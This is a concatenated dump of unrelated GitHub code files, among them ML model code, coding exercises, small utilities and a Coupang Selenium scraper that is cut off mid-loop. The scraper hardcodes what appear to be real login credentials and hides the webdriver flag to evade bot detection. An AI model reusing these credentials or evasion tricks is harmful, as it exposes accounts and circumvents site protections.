len(heads)\n self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads\n self.pruned_heads = self.pruned_heads.union(heads)\n\n def forward(\n self,\n query_tensor,\n key_tensor,\n value_tensor,\n layer_input,\n attention_mask=None,\n head_mask=None,\n output_attentions=None,\n ):\n self_outputs = self.self(\n query_tensor,\n key_tensor,\n value_tensor,\n attention_mask,\n head_mask,\n output_attentions,\n )\n # Run a linear projection of `hidden_size` then add a residual\n # with `layer_input`.\n attention_output = self.output(self_outputs[0], layer_input)\n outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them\n return outputs\n\n\ndef prune_linear_layer(layer: nn.Linear, index, dim: int = 0) -> nn.Linear:\n \"\"\"\n Prune a linear layer to keep only entries in index.\n\n Used to remove heads.\n\n Args:\n layer (:obj:`torch.nn.Linear`): The layer to prune.\n index (:obj:`torch.LongTensor`): The indices to keep in the layer.\n dim (:obj:`int`, `optional`, defaults to 0): The dimension on which to keep the indices.\n\n Returns:\n :obj:`torch.nn.Linear`: The pruned layer as a new layer with :obj:`requires_grad=True`.\n \"\"\"\n index = index.to(layer.weight.device)\n W = layer.weight.index_select(dim, index).clone().detach()\n if layer.bias is not None:\n if dim == 1:\n b = layer.bias.clone().detach()\n else:\n b = layer.bias[index].clone().detach()\n new_size = list(layer.weight.shape)\n new_size[dim] = len(index)\n new_layer = nn.Linear(new_size[1], new_size[0], bias_attr=layer.bias is not None)\n new_layer.weight.requires_grad = False\n new_layer.weight.copy_(W.contiguous())\n new_layer.weight.requires_grad = True\n if layer.bias is not None:\n new_layer.bias.requires_grad = False\n new_layer.bias.copy_(b.contiguous())\n new_layer.bias.requires_grad = True\n return new_layer\n\n\ndef find_pruneable_heads_and_indices(\n heads: List[int], n_heads: int, head_size: int, already_pruned_heads: Set[int]\n) -> Tuple[Set[int], paddle.Tensor]:\n \"\"\"\n Finds the heads and their indices taking :obj:`already_pruned_heads` into account.\n\n Args:\n heads (:obj:`List[int]`): List of the indices of heads to prune.\n n_heads (:obj:`int`): The number of heads in the model.\n head_size (:obj:`int`): The size of each head.\n already_pruned_heads (:obj:`Set[int]`): A set of already pruned heads.\n\n Returns:\n :obj:`Tuple[Set[int], torch.LongTensor]`: A tuple with the remaining heads and their corresponding indices.\n \"\"\"\n mask = paddle.ones((n_heads, head_size))\n heads = set(heads) - already_pruned_heads # Convert to set and remove already pruned heads\n for head in heads:\n # Compute how many pruned heads are before the head and move the index accordingly\n head = head - sum(1 if h < head else 0 for h in already_pruned_heads)\n mask[head] = 0\n mask = mask.reshape(-1) == 1\n # keep the positions where the mask is True: arange is the data, mask is the boolean filter\n index = paddle.masked_select(paddle.arange(len(mask)), mask)\n return heads, index\n","repo_name":"zhengtongopu/MobileBERT-paddle","sub_path":"mobilebert_paddle/mobile_bert_att.py","file_name":"mobile_bert_att.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40936536526","text":"import sys\nsys.path.insert(0, '.')\nfrom tools import log\n\n\ndef to_num(s):\n return int(s.replace(\"\\n\", \"\"))\n\n@log\ndef get_largernums(data):\n last_number = to_num(data[0]) + to_num(data[1]) + to_num(data[2])\n larger_numbers = 0\n\n\n # compare each three-measurement window with the one before it\n for i in range(1, len(data)-2):\n 
number = to_num(data[i]) + to_num(data[i + 1]) + to_num(data[i + 2])\n\n if number > last_number:\n larger_numbers += 1\n\n last_number = number\n\n return larger_numbers\n\n\ndata1 = open(\"./Day 1/data1\", \"r\").readlines()\ndata2 = open(\"./Day 1/data2\", \"r\").readlines()\n\nget_largernums(data1)\nget_largernums(data2)","repo_name":"mightytry/AdventOfCode","sub_path":"Adventofcode 2021/Day 1/sonar.py","file_name":"sonar.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38488698461","text":"import pygame\n\n# Initialiserer Pygame\npygame.init()\n\n# Oppretter vinduet\nscreen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n\n# Setter tittelen på vinduet\npygame.display.set_caption(\"Bouncing Ball\")\n\n# Angir hvilken skrifttype og tekststørrelse vi vil bruke på tekst\nfont = pygame.font.SysFont(\"Arial\", 50)\n\nWHITE = (255, 255, 255)\nBLACK = (0,0,0)","repo_name":"akselwe/akselwe.github.io","sub_path":"gitGames/jumpingGame/jumping.py","file_name":"jumping.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39586979730","text":"import requests\nimport json\nimport os\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\n\napi_key = os.getenv('api_key')\n\n\nresponse = requests.get(\"https://newsapi.org/v2/top-headlines?country=us&category=technology&apiKey={}\".format(api_key))\n\n#print(response.title)\n\njson_object = json.loads(response.content)\n\n# json_data = response.json()\narticles = json_object[\"articles\"]\n\narticles_dict = []\n\nfor element in articles:\n title = str(element.get('title'))\n published = str(element.get('publishedAt'))\n author = str(element.get('author'))\n description = str(element.get('description'))\n url_for_article = str(element.get('url'))\n content = str(element.get('content'))\n\n element = '''**Title:** {}\\n**Date Published:** {}\\n**Author:** {}\\n**Description**: {}\\n\\n{}\\n\\n{}\\n\n '''.format(title, published, author, description, content, url_for_article)\n\n articles_dict.append(element)\n\narticles = articles_dict[6]\n\n# print(articles)\n","repo_name":"Fiscoon/great_sage_of_forbidden_knowledge","sub_path":"news_api.py","file_name":"news_api.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30306678789","text":"'''Demonstrate a read-only attribute.\n\nSets an attribute to read-only using the @property decorator. 
See the following\nfor more information: http://go/pylib/functions.html#property\n'''\nclass Parrot(object):\n def __init__(self):\n self._voltage = 100000\n\n @property\n def voltage(self):\n \"\"\"Get the current voltage.\"\"\"\n return self._voltage\n\np = Parrot()\np.voltage\n''' Setting the voltage should result in:\nTraceback (most recent call last):\n File \"property.py\", line 12, in \n p.voltage = 2\nAttributeError: can't set attribute\n\n'''\np.voltage = 2\np.voltage\n","repo_name":"the-hobbes/misc","sub_path":"property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"71480253879","text":"import matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nimport os\nimport argparse\nimport itertools\nimport torch\nimport torch.nn as nn\n\nimport numpy as np\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom advertorch.attacks import LinfPGDAttack\n\nimport vgg\nfrom vgg import VGG\n\n# set whether to use GPU\ntorch.manual_seed(0)\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\n\n####################################\n# model dir\n####################################\nif use_cuda:\n MODEL = \"model.pkl\"\nelse:\n MODEL = \"model.pkl\"\n\n####################################\n# load model\n####################################\nif os.path.isfile(MODEL):\n print(\"=> loading model '{}'\".format(MODEL))\n if use_cuda:\n model = torch.load(MODEL)['net']\n model.to(device)\n else:\n model = torch.load(MODEL, map_location=device)['net']\n print('model loaded')\nelse:\n print(\"=> no checkpoint found at '{}'\".format(MODEL))\n\n####################################\n# load data\n####################################\nbatch_size = 5\n\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n\ntrainset = torchvision.datasets.CIFAR10(root='./data', train=True,\n download=True, transform=transform)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size,\n shuffle=True, num_workers=0)\n\ntestset = torchvision.datasets.CIFAR10(root='./data', train=False,\n download=True, transform=transform)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=batch_size,\n shuffle=False, num_workers=0)\n\nclasses = ('plane', 'car', 'bird', 'cat',\n 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n####################################\n# Test acc on training dataset\n####################################\nclass_correct = list(0. for i in range(10))\nclass_total = list(0. for i in range(10))\n\nwith torch.no_grad():\n for data in trainloader:\n images, labels = data[0].to(device), data[1].to(device)\n outputs = model(images)\n _, predicted = torch.max(outputs, 1)\n c = (predicted == labels).squeeze()\n for i in range(batch_size):\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\nfor i in range(10):\n print('Training accuracy of %5s : %2d %%' % (\n classes[i], 100 * class_correct[i] / class_total[i]))\n\n\n\n####################################\n# Test acc on testing dataset\n####################################\nclass_correct = list(0. for i in range(10))\nclass_total = list(0. 
for i in range(10))\n\nwith torch.no_grad():\n for data in testloader:\n images, labels = data[0].to(device), data[1].to(device)\n outputs = model(images)\n _, predicted = torch.max(outputs, 1)\n c = (predicted == labels).squeeze()\n for i in range(batch_size):\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\nfor i in range(10):\n print('Testing accuracy of %5s : %2d %%' % (\n classes[i], 100 * class_correct[i] / class_total[i]))\n","repo_name":"zifanw/frequency_explain","sub_path":"vgg_attack_CIFAR/vgg_acc.py","file_name":"vgg_acc.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"6161795712","text":"import csv\r\nimport os\r\nimport shutil\r\nfrom pydub import AudioSegment\r\n\r\nfolders = ['regular', 'slow', 'fast', 'dirty']\r\nmaxNumber = 1500\r\n\r\nlst = os.listdir('backVoice')\r\ni=0\r\ndef dirty(file1):\r\n newName = f'D:/dirty/{file1[-17:]}'\r\n global i\r\n sound1 = AudioSegment.from_wav(file1)\r\n sound2 = AudioSegment.from_wav(f'backVoice/{lst[i%len(lst)]}')\r\n # mix sound2 with sound1, starting at 5000ms into sound1)\r\n output = sound1.overlay(sound2, position=0)\r\n # save the result\r\n output.export(newName, format=\"wav\")\r\n i+=1\r\n return newName\r\ndef speed(name, speed):\r\n newName = ''\r\n if speed == 'fast':\r\n newName = f'D:/fast/{name[-17:]}'\r\n os.system(f'ffmpeg -i {name} -af \"atempo=2\" {newName}')\r\n else:\r\n newName = f'D:/slow/{name[-17:]}'\r\n os.system(f'ffmpeg -i {name} -af \"atempo=0.5\" {newName}')\r\n return newName\r\ndef creat(name, index):\r\n if folders[index%len(folders)] == 'regular':\r\n newName = f'D:/regular/{couple[0][-17:]}'\r\n shutil.copyfile(name,newName)\r\n return newName\r\n elif folders[index%len(folders)] == 'dirty':\r\n return dirty(name)\r\n else:\r\n return speed(name, folders[index%len(folders)])\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n newData = []\r\n genderCount = {'male': 0, 'female':0}\r\n with open('balanced-all.csv' ,'r', newline='') as csvfile:\r\n reader = csv.reader(csvfile)\r\n next(reader,None)\r\n for couple in reader:\r\n # print(couple)\r\n # print(couple[0][-17:])\r\n print(f'male: {genderCount[\"male\"]}')\r\n print(f'female: {genderCount[\"female\"]}')\r\n if genderCount['male'] == 3400 and genderCount['female'] == 3400: \r\n break\r\n if genderCount[couple[1]] >= 3400:\r\n continue\r\n if genderCount[couple[1]] <= 1500:\r\n newName = creat(couple[0], genderCount[couple[1]])\r\n else:\r\n newName = creat(couple[0], 0)\r\n newData.append([newName , couple[1]])\r\n genderCount[couple[1]]+=1\r\n\r\n with open('new_balanced-all.csv' ,'a', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n writer.writerows(newData)","repo_name":"dvirGev/gender-recognition-by-voice","sub_path":"makeNewDataBase.py","file_name":"makeNewDataBase.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24330620455","text":"def permute(nums):\n # define a helper function for backtracking\n def dfs(ind):\n # base case: add the current permutation to the result\n if ind == len(nums):\n result.append(nums[:])\n # recursive case: swap each element with the first element, then recurse\n for i in range(ind, len(nums)):\n nums[ind], nums[i] = nums[i], nums[ind]\n dfs(ind + 1)\n nums[ind], nums[i] = nums[i], nums[ind]\n\n result = []\n dfs(0)\n return result\n\nn = ['a','b','c']\n# 
subsets are different than permutations \n# subsets can be empty\n# permutations must be equal in length to the input \n# permutations are N!\n# subsets are 2^N * N at best! \n# _ first position can choose 3 values \n# _ _ second position can choose 2 values\n# _ _ _ third position can choose only 1 value left \n# 3*2*1 \n# N * (N-1) .... * 1 = N! \n'''\nThe main difference is that there is no length condition, \n(remember that a subset/combination can be empty and/or have fewer elements than the input set\n- whereas a permutation must be equal in length to the input).\n\nPermutation - is a rearrangement of elements \nabc \nacb \nbac\nbca\ncab\ncba\nElements ! \nN ! \n'''\nprint(permute(n))\n\nclass Solution:\n def permutations(self,nums:list[int])->list[list[int]]:\n result = [] \n if len(nums) == 1:\n return [nums[:]]\n \n for _ in range(len(nums)):\n n = nums.pop(0) \n perms = self.permutations(nums)\n for perm in perms:\n perm.append(n)\n result.extend(perms)\n nums.append(n)\n \n return result \n \nsolve = Solution()\nn1 = [1,2,3]\nx = solve.permutations(n1)\n\n\ndef generatePermutations(nums):\n answers = []\n\n permutation = []\n used = set()\n\n def backtrack():\n if (len(permutation) == len(nums)):\n answers.append(permutation.copy())\n return\n #[1, 2, 3]\n # N * (N * N-1 ...1 )= N*N!\n # depth = N \n for i in range(len(nums)):\n if i not in used:\n used.add(i)\n permutation.append(nums[i])\n backtrack()\n used.remove(i) # 2 \n permutation.pop() # nums[2] == 3 \n\n backtrack()\n return answers","repo_name":"jonathanyulan99/SDE-Fundamentals","sub_path":"ALL/Formation/Algo Workout/Intermediate Recursion/algo_pair_session_may_7.py","file_name":"algo_pair_session_may_7.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21599288758","text":"from time import sleep\nv1 = int(input('Primeiro valor: '))\nv2 = int(input('Segundo valor: '))\nopção = 0\nmaior = 0\nwhile opção != 5:\n opção = int(input(''' [1] Somar\n [2] Multiplicar\n [3] Maior\n [4] Novos números\n [5] Sair do programa\n>>>> Qual é sua opção? '''))\n\n if opção == 1:\n print('A soma entre {} + {} = {}'.format(v1, v2, v1+v2))\n elif opção == 2:\n print('O resultado de {} x {} é {}'.format(v1, v2, v1*v2))\n elif opção == 3:\n if v1 == v2:\n print('São iguais.')\n else:\n maior = v1 if v1 > v2 else v2\n print('Entre {} e {} o maior valor é {}'.format(v1, v2, maior))\n elif opção == 4:\n print('Informe os números novamente:')\n v1 = int(input('Primeiro valor: '))\n v2 = int(input('Segundo valor: '))\n elif opção == 5:\n print('Finalizando...')\n sleep(2)\n else:\n print('Opção inválida. Tente novamente!')\n print('=-=' * 15)\n\nprint('Fim do programa! 
Volte sempre!')","repo_name":"Lucas-ns/Python-3-Curso-Em-Video","sub_path":"PythonExercicios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26803556284","text":"import os\r\nimport shutil\r\n\r\n\r\nprint(\"Test mod kuler by Rubrik25\")\r\nprint(\"Version V 1.5\")\r\n\r\nmmd = open(\"MMD.txt\", \"r\")\r\nmmdr = mmd.read()\r\nprint(mmdr)\r\n\r\nconf = open(\"Conf.txt\", \"r\")\r\nconfr = conf.read()\r\nprint(confr)\r\n\r\ntry:\r\n os.mkdir(\"mods\")\r\n os.chdir(\"mods\")\r\nexcept:\r\n os.chdir(\"mods\")\r\n\r\nif confr == \"ru\":\r\n for dirpath, dirnames, filenames in os.walk(\".\"):\r\n for dirname in dirnames:\r\n print(\"Папка:\", os.path.join(dirpath, dirname))\r\n \r\n for filename in filenames:\r\n print(\"Мод:\", os.path.join(dirpath, filename))\r\n while(True):\r\n try:\r\n jq = input(\"Который мод тебе нужно установить: \")\r\n jqc = jq[2:]\r\n print(jqc)\r\n shutil.copy(os.getcwd()+ \"\\\\\" + jqc, mmdr)\r\n except:\r\n print(\"Проблема..\")\r\nif confr == \"en\":\r\n for dirpath, dirnames, filenames in os.walk(\".\"):\r\n \r\n for dirname in dirnames:\r\n print(\"Folder:\", os.path.join(dirpath, dirname))\r\n \r\n for filename in filenames:\r\n print(\"Mod:\", os.path.join(dirpath, filename))\r\n while(True):\r\n try:\r\n jq = input(\"Which mod do you need to install: \")\r\n print(jq)\r\n jqc = jq[2:]\r\n print(jqc)\r\n shutil.copy(os.getcwd()+ \"\\\\\" + jqc, mmdr)\r\n except:\r\n print(\"Problem..\")\r\n","repo_name":"Rubrik25/ModCoolerForMinecraft","sub_path":"MOD COOLER V 1.5/Start.py","file_name":"Start.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27298847312","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def buildTree(self, preorder, inorder):\n \"\"\"\n :type preorder: List[int]\n :type inorder: List[int]\n :rtype: TreeNode\n \"\"\"\n def dfs(preorder, inorder):\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n # print (preorder, inorder)\n mid = inorder.index(preorder[0])\n \n root.left = dfs(preorder[1:mid+1], inorder[:mid])\n root.right = dfs(preorder[mid+1:], inorder[mid+1:])\n return root\n return dfs(preorder, inorder)","repo_name":"larui529/LeetCode","sub_path":"Tree/105. 从前序与中序遍历序列构造二叉树/105.py","file_name":"105.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13033594386","text":"\ndef get_n_value():\n while True:\n try:\n return int(input(\"Please enter the first number (N): \"))\n except ValueError:\n print(\"Entered value is not an integer. Try again\")\n\n\ndef get_m_value():\n while True:\n try:\n return int(input(\"Please enter the second number (M) which is > than first one: \"))\n except ValueError:\n print(\"Entered value is not an integer. 
Try again\")\n return m\n\n\ndef validate_input_numbers(n, m):\n \"Input numbers must follow condition: 1 <= n < m <=10000\"\n flag = True\n if n >= m:\n flag = False\n print(\"Provided numbers did not follow condition: n < m \")\n\n if n < 1:\n flag = False\n print(\"Provided first number is lower than 1.\")\n\n if m > 10000:\n flag = False\n print(\"Provided second number is greater than 10000.\")\n\n return flag\n\n\ndef print_integers(n, m):\n ordered_output = []\n for i in range(n, m+1):\n if i % 15 == 0:\n i = \"FizzBuzz\"\n elif i % 3 == 0:\n i = \"Fizz\"\n elif i % 5 == 0:\n i = \"Buzz\"\n else:\n i = str(i)\n ordered_output.append(i)\n\n for x in ordered_output:\n print(x)\n\n\nif __name__ == \"__main__\":\n flag = False\n while flag == False:\n n = get_n_value()\n m = get_m_value()\n flag = validate_input_numbers(n, m)\n print_integers(n, m)\n","repo_name":"miwiana/python_excersises","sub_path":"fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74785385719","text":"from matplotlib import animation\nimport matplotlib.pyplot as plt\n\ndef display_save(frames, episode):\n\n plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0),\n dpi=72)\n patch = plt.imshow(frames[0])\n plt.axis('off')\n\n def animate(i):\n patch.set_data(frames[i])\n\n anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames),\n interval=50)\n\n anim.save('movie_snake-v0_DQN_'+str(episode)+'.mp4')","repo_name":"dkdkdkdkd/puckworld","sub_path":"display_save.py","file_name":"display_save.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19597113606","text":"from typing import Dict, List\nfrom models.pydantic_models import CarRead\n\n\ndef get_car_prices(cars: List[CarRead]) -> Dict[str, List[int]]:\n price_buckets = {\n \"under_20k\": [],\n \"20_30k\": [],\n \"30_40k\": [],\n \"40_50k\": [],\n \"50_60k\": [],\n \"60_80k\": [],\n \"80_100k\": [],\n \"100_130k\": [],\n \"130_180k\": [],\n \"180_220k\": [],\n \"over_220k\": [],\n }\n\n for car in cars:\n if car.current_price is None:\n continue\n\n if car.current_price < 20000:\n price_buckets[\"under_20k\"].append(car.id)\n elif 20000 <= car.current_price < 30000:\n price_buckets[\"20_30k\"].append(car.id)\n elif 30000 <= car.current_price < 40000:\n price_buckets[\"30_40k\"].append(car.id)\n elif 40000 <= car.current_price < 50000:\n price_buckets[\"40_50k\"].append(car.id)\n elif 50000 <= car.current_price < 60000:\n price_buckets[\"50_60k\"].append(car.id)\n elif 60000 <= car.current_price < 80000:\n price_buckets[\"60_80k\"].append(car.id)\n elif 80000 <= car.current_price < 100000:\n price_buckets[\"80_100k\"].append(car.id)\n elif 100000 <= car.current_price < 130000:\n price_buckets[\"100_130k\"].append(car.id)\n elif 130000 <= car.current_price < 180000:\n price_buckets[\"130_180k\"].append(car.id)\n elif 180000 <= car.current_price < 220000:\n price_buckets[\"180_220k\"].append(car.id)\n\n # Over 220k\n elif car.current_price > 220000:\n price_buckets[\"over_220k\"].append(car.id)\n\n return price_buckets\n\n\ndef get_acceleration(cars: List[CarRead]) -> Dict[str, List[int]]:\n acceleration_buckets = {\n \"under_2s\": [],\n \"2_3s\": [],\n \"3_4s\": [],\n \"4_5s\": [],\n \"6_8s\": [],\n \"8_10s\": [],\n \"over_10s\": [],\n }\n\n for car in cars:\n if car.acceleration_0_60 is None:\n 
continue\n\n if car.acceleration_0_60 < 2:\n acceleration_buckets[\"under_2s\"].append(car.id)\n elif 2 <= car.acceleration_0_60 < 3:\n acceleration_buckets[\"2_3s\"].append(car.id)\n elif 3 <= car.acceleration_0_60 < 4:\n acceleration_buckets[\"3_4s\"].append(car.id)\n elif 4 <= car.acceleration_0_60 < 5:\n acceleration_buckets[\"4_5s\"].append(car.id)\n elif 6 <= car.acceleration_0_60 < 8:\n acceleration_buckets[\"6_8s\"].append(car.id)\n elif 8 <= car.acceleration_0_60 < 10:\n acceleration_buckets[\"8_10s\"].append(car.id)\n elif car.acceleration_0_60 >= 10:\n acceleration_buckets[\"over_10s\"].append(car.id)\n\n return acceleration_buckets\n\n\ndef get_top_speed(cars: List[CarRead]) -> Dict[str, List[int]]:\n top_speed_buckets = {\n \"under_100\": [],\n \"100_120\": [],\n \"120_150\": [],\n \"150_180\": [],\n \"180_200\": [],\n \"over_200\": [],\n }\n\n for car in cars:\n if car.top_speed is None:\n continue\n\n if car.top_speed < 100:\n top_speed_buckets[\"under_100\"].append(car.id)\n elif 100 <= car.top_speed < 120:\n top_speed_buckets[\"100_120\"].append(car.id)\n elif 120 <= car.top_speed < 150:\n top_speed_buckets[\"120_150\"].append(car.id)\n elif 150 <= car.top_speed < 180:\n top_speed_buckets[\"150_180\"].append(car.id)\n elif 180 <= car.top_speed < 200:\n top_speed_buckets[\"180_200\"].append(car.id)\n elif car.top_speed >= 200:\n top_speed_buckets[\"over_200\"].append(car.id)\n\n return top_speed_buckets\n\n\ndef bucket_cars_by_attributes(cars: List[CarRead]) -> Dict[str, Dict[str, List[int]]]:\n price_buckets = get_car_prices(cars)\n acceleration_buckets = get_acceleration(cars)\n top_speed_buckets = get_top_speed(cars)\n car_features = {\n \"prices\": price_buckets,\n \"acceleration\": acceleration_buckets,\n \"top_speed\": top_speed_buckets,\n # ... Other feature buckets ...\n }\n return car_features\n","repo_name":"jpwilson/ev_backend","sub_path":"services/car_features.py","file_name":"car_features.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20816162353","text":"\nimport collections\nfrom typing import List,Optional\nimport copy\n\nclass Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n stack=[]\n for token in tokens:\n if token==\"+\" or token==\"-\" or token==\"*\" or token==\"/\":\n val2=stack.pop()\n val1=stack.pop()\n newval=0\n if token=='+':\n newval=val1+val2\n elif token=='-':\n newval=val1-val2\n elif token=='*':\n newval=val1*val2\n elif token=='/':\n rev=False\n if val1<0:\n val1=-val1\n rev=not rev\n if val2<0:\n val2=-val2\n rev=not rev\n newval=val1//val2\n if rev:\n newval=-newval\n stack.append(newval)\n else:\n stack.append(int(token))\n return stack[0]\n\nsol=Solution()\ntokens = [\"2\",\"1\",\"+\",\"3\",\"*\"]\ntokens1=[\"10\",\"6\",\"9\",\"3\",\"+\",\"-11\",\"*\",\"/\",\"*\",\"17\",\"+\",\"5\",\"+\"]\nprint(sol.evalRPN(tokens1))\n\n\n# 输入:tokens = [\"2\",\"1\",\"+\",\"3\",\"*\"]\n# 输出:9\n# 解释:该算式转化为常见的中缀算术表达式为:((2 + 1) * 3) = 9\n","repo_name":"Reigo666/Leetcode","sub_path":"Reigo/leetcode/Python/150. 逆波兰表达式求值.py","file_name":"150. 逆波兰表达式求值.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32126305167","text":"\"\"\"\nProblem: https://codeforces.com/problemset/problem/546/A\n\"\"\"\n\ndef solve():\n # Take input\n k,n,w = map(int, input().split())\n\n # he needed following money for buying\n # 1k + 2k + 3k .... 
wk = k * w * (w+1) / 2\n needed = int(k * w * (w + 1) / 2)\n\n # if needed is greater than he has, print (needed - n) else print n\n print(0 if needed < n else (needed - n))\n\nif __name__ == '__main__':\n solve()","repo_name":"love1024/codeforces-journery","sub_path":"17 - 546A - Soldier and Bananas.py","file_name":"17 - 546A - Soldier and Bananas.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37894232676","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n# Chrome 웹 드라이버 경로 설정 (본인의 환경에 맞게 수정)\n\n\n# Chrome 웹 드라이버 생성\ndriver = webdriver.Chrome()\n\ndriver.execute_cdp_cmd(\n \"Page.addScriptToEvaluateOnNewDocument\",\n {\n \"source\": \"\"\" Object.defineProperty(navigator, 'webdriver', { get: () => undefined }) \"\"\"\n },\n)\n\nurl = \"https://login.coupang.com/login/login.pang?rtnUrl=https%3A%2F%2Fmc.coupang.com%2Fssr%2Fdesktop%2Forder%2Flist\"\n\n# url 로딩\ndriver.get(url)\n\n# 로그인 정보input\ndriver_id = driver.find_element(By.ID, \"login-email-input\")\ndriver_id.send_keys(\"kim4989d@naver.com\") # 문자열 형식으로 아이디 입력\n\ndriver_pw = driver.find_element(By.ID, \"login-password-input\")\ndriver_pw.send_keys(\"kim21541\") # 문자열 형식으로 비밀번호 입력\n\n# 로그인 버튼 클릭\n\n\n# login = driver.find_element(By.CLASS_NAME,'login__button login__button--submit _loginSubmitButton login__button--submit-rds')\n\n\nlogin = driver.find_element(\n By.XPATH,\n \"//button[@class='login__button login__button--submit _loginSubmitButton login__button--submit-rds']\",\n)\n# print('print ',login)\n# login = driver.find_elements_by_xpath(\"//button[@class='login__button login__button--submit _loginSubmitButton login__button--submit-rds']\")\nlogin.click()\n\n# 로그인 후 페이지 로딩 대기 (적절한 방법으로 변경 가능)\n# driver.implicitly_wait(10)\n\n\n# 검색 입력란과 같은 특정 요소를 대기하기 위해 명시적 대기 사용\nwait = WebDriverWait(driver, 10)\nwait.until(EC.presence_of_element_located((By.ID, 'headerSearchKeyword')))\n\n# for _ in range(2): # 스크롤을 5번 내립니다. 
필요에 따라 조정 가능\n# driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n# sleep(2) # 스크롤 후 잠시 대기\n\n\n\n# 검색어 입력 및 검색 버튼 클릭\n\nsearch_input = driver.find_element(By.XPATH, \"//input[@id='headerSearchKeyword']\")\nsearch_input.send_keys(\"노트북\")\n\nsearch_input.send_keys(Keys.RETURN)\n\n\n# 검색 결과 페이지 로딩 대기\nsleep(10)\n\n\n# descriptions\n\n# 상품 리스트 가져오기\nproduct_list = driver.find_element(By.XPATH, \"//ul[@id='productList']\")\n\n# BeautifulSoup으로 파싱\nsoup = BeautifulSoup(product_list.get_attribute(\"outerHTML\"), \"html.parser\")\n\nspanvalue = []\nstrongvalue = []\n\n\ni=0\n# 광고 상품 제외하고 각 상품 정보 가져오기\nfor product in soup.find_all(\"li\", class_=\"search-product\"):\n # 광고 상품인 경우 스킵\n if product.find(class_=\"search-product__ad-badge\"):\n continue\n try:\n product_name = product.find(\"div\", class_=\"name\").text.strip()\n original_price = product.find(\"del\", class_=\"base-price\").text.strip()\n sale_price = product.find(\"strong\", class_=\"price-value\").text.strip()\n # rating = product.find(\"em\", class_=\"rating\").text.strip()\n review_count = product.find(\"span\", class_=\"rating-total-count\").text.strip()\n card_discount = (\n product.find(\"span\", class_=\"ccid-txt\").text.strip()\n if product.find(\"span\", class_=\"ccid-txt\")\n else \"N/A\"\n )\n reward_info = (\n product.find(\"span\", class_=\"reward-cash-txt\").text.strip()\n if product.find(\"span\", class_=\"reward-cash-txt\")\n else \"N/A\"\n )\n # delivery_info = product.find(\"span\", class_=\"arrival-info\").text.strip()\n\n\n div_elements = product.find_all('div', class_='used-product-info')\n spanchar=''\n strongchar=''\n # Now, let's find all span elements within the selected div elements\n for div in div_elements:\n span_elements = div.find_all('span')\n strong_elements = div.find_all('strong')\n \n for span in span_elements:\n print(span.text) # 